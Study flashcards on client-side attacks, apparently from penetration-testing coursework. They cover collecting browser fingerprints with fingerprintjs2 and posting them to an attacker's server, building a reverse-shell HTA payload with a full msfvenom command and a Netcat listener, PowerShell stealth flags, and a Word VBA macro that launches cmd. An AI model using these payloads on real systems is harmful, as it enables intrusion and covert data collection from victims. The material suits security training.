Client-Side Attacks Flashcards
What tool is used for web browser fingerprinting?
Fingerprintjs2
How do we get the browser fingerprint on a victim machine?
- download fingerprintjs2
- unzip into /var/www/html
- Rename the main directory and move it into its own directory named 'fp':
- - mv fingerprintjs2-master/ fp
- Start the apache2 server
- Get the victim to browse to the fingerprintjs2 page at /fp/index.html
- Get the fingerprint data from the fingerprint.txt file using Ajax
How do we get the output of the victim browser fingerprint saved to the attacking machine?
- the default settings of the index.html file save the browser fingerprint data to the victim machine
- we can instead place Ajax code into the index.html web page that does the browser fingerprinting, and instruct it to send the output to our attacking machine as an XMLHttpRequest POST request to /fp/js.php, which saves it
- ** the following code gets placed within the Fingerprint2.get function of index.html **
- var clientfp = "Client browser fingerprint: " + murmur + "\n\n";
- var xmlhttp = new XMLHttpRequest();
- xmlhttp.open("POST", "/fp/js.php");
- xmlhttp.setRequestHeader("Content-Type", "application/text");
- xmlhttp.send(clientfp + timeString + details);
- PHP code (js.php) then processes the POST request on the attacking server and writes the data to a file
- In order for this to work, the Apache www-data user needs to be allowed to write to the 'fp' directory
What is a .hta file?
- If a file is created with the extension .hta instead of .html, IE will automatically interpret it as an "HTML Application" (HTA) and offer the ability to execute it using the 'mshta.exe' program
- This allows an attacker to execute arbitrary code with the user's permissions, avoiding the security restrictions normally imposed by IE on a web page
How can HTA be used to execute shell commands?
- This attack vector allows us to compromise a Windows client through IE
- ActiveXObjects provide access to underlying operating system commands
- This is achieved through the WScript (Windows Script Host) Shell object
- Once we instantiate a WScript Shell object, we can invoke its 'run' method in order to launch an application on the target client machine
How to create an HTA attack?
- use msfvenom with the 'hta-psh' output format (an HTA that launches a PowerShell payload)
- sudo msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.4 LPORT=4444 -f hta-psh -o /var/www/html/evil.hta
What PowerShell option prevents the PowerShell user profile from loading?
- -nop
- - short for -NoProfile
What PowerShell option prevents PowerShell from creating a window on the user's desktop?
- -w hidden
- - short for -WindowStyle hidden
What are the steps to get a reverse shell on a victim machine with a .hta file created in Msfvenom?
- Create evil.hta with msfvenom
- Host the evil.hta file on the Apache2 server
- Launch a Netcat listener on the LPORT used in msfvenom
- The user navigates to the URL of evil.hta
- The user accepts two security warnings
- Get a reverse shell on the listener
What is one of the oldest and best-known client-side software attack vectors?
Microsoft Word Macro
What is a Macro?
- a series of commands and instructions that are grouped together to accomplish a task programmatically
- Macros can be written from scratch in Visual Basic for Applications (VBA)
What is VBA?
- Visual Basic for Applications
- Fully functional scripting language with full access to ActiveX objects and the WScript Host
What is similar to a ‘function’ in VBA?
- Sub procedure
- the difference between a Sub procedure and a Function is that a Sub procedure does not return a value, so it cannot be used in expressions
How is a macro inserted into a Word or Excel document?
- View > Macros (then create/edit the macro in the VBA editor)
Create a simple macro that opens cmd.exe
– Sub MyMacro()
–     CreateObject("Wscript.Shell").Run "cmd"
– End Sub